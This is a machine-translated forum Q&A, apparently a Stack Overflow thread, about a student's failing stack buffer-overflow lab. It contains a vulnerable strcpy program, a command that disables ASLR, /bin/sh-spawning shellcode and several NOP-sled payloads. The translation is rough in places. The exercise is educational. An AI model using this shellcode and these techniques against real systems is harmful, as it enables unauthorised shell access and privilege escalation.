[英]Buffer Overflow Attack doesn't work on Ubuntu 20.04
我正在尝试对一个简单的 C 程序进行缓冲区溢出攻击,该程序需要一个缓冲区并打印它。 我尝试了很多组合,但最后,当我尝试执行我的 shellcode 时,我总是得到分段错误。
我主要遵循本教程:
不同之处在于我尝试在 m64 中编译程序,因为当我在 m32 中编译时,我的 memory 地址都不同,我试图解释我的步骤,但如果他们不清楚你可以看视频,因为我'已经遵循相同的程序。
我用来尝试攻击的代码是
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
我以这种方式编译代码:
gcc -o example -fno-stack-protector -m64 -z execstack example.c
我也试过用 m32 编译它,但正如我之前所说,但我用 gdb 反汇编后的结果与教程完全不同,另一方面,当我用 m64 编译它时,它们非常相似,所以更容易跟随。
一旦我编译它并打开 gdb 我反汇编程序的主体并寻找 strcpy 调用。 我 select 在 strcpy 调用之后的地址之一,我在该地址中设置了一个断点。
在此之后我运行 python 代码
run $(python -c "print('A'*256)")
然后我在运行这个命令后检查程序的内容,它打印出 256 As。 我用命令检查它
x/200xb $esp
我现在可以在 memory 中看到我的“AAA..”序列开始的确切地址,我将它写在一篇论文中,然后再次运行我的 python 代码以了解它在分段错误 Z9ED39E2EA931586B73A985A6942 中的值。
一旦找到 Seg Fault 条件,我只需运行以下命令:
run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xcf\xff\xff')")
在哪里:
此时,当我运行命令时,shellcode 应该被执行但它没有发生,它总是说 Segmentation Fault。
当然我也用命令禁用了 aslr
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
抱歉,如果我的解释很混乱,我已经尝试了所有不同的可能性,但我从来没有得到正确的结果。 (当然要更改一些标志,m64,m32 并稍微使用最后一个命令的值)。
在此先感谢,我真的希望你能帮助我,因为我需要为大学作业解决这个问题
我认为您的错误在于退货地址:
run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xfc\xff\xbf')")
而不是0xffffcf94
(在 m32)使用0xbffffc94
。
也许这是错误的,因为你看的视频真的很老了,很多东西都变了,直到今天
要对其进行测试,请在主 function 中的返回指令处设置断点,然后将info registers
键入 gdb 以查看esp
(堆栈指针)的值是多少
如果不是这种情况,那么您的 shellcode 对于 ubuntu 20.04 可能已经过时,或者您在 x86 可执行文件中使用 x64 shellcode
尝试在你的 shellcode 的开头添加一个\xcc
来测试你的 shellcode 是否被破坏并导致SIGSEGV
信号
我也尝试自己开发一个 POC,它是:
run $(python -c 'print "\x90"*255 + "\xcc" + "aaaabbbbcccc" + "\x68\xfb\xff\xbf"')
其中\x90 * 255
是 255 条nop
指令,以确保我们将降落在陷阱\xcc
上。 aaaabbbbcccc
是我用来访问 eip 的一些垃圾, 0xbffffb68
是堆栈的返回地址。
您需要在跳转地址之前添加“ret”小工具
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.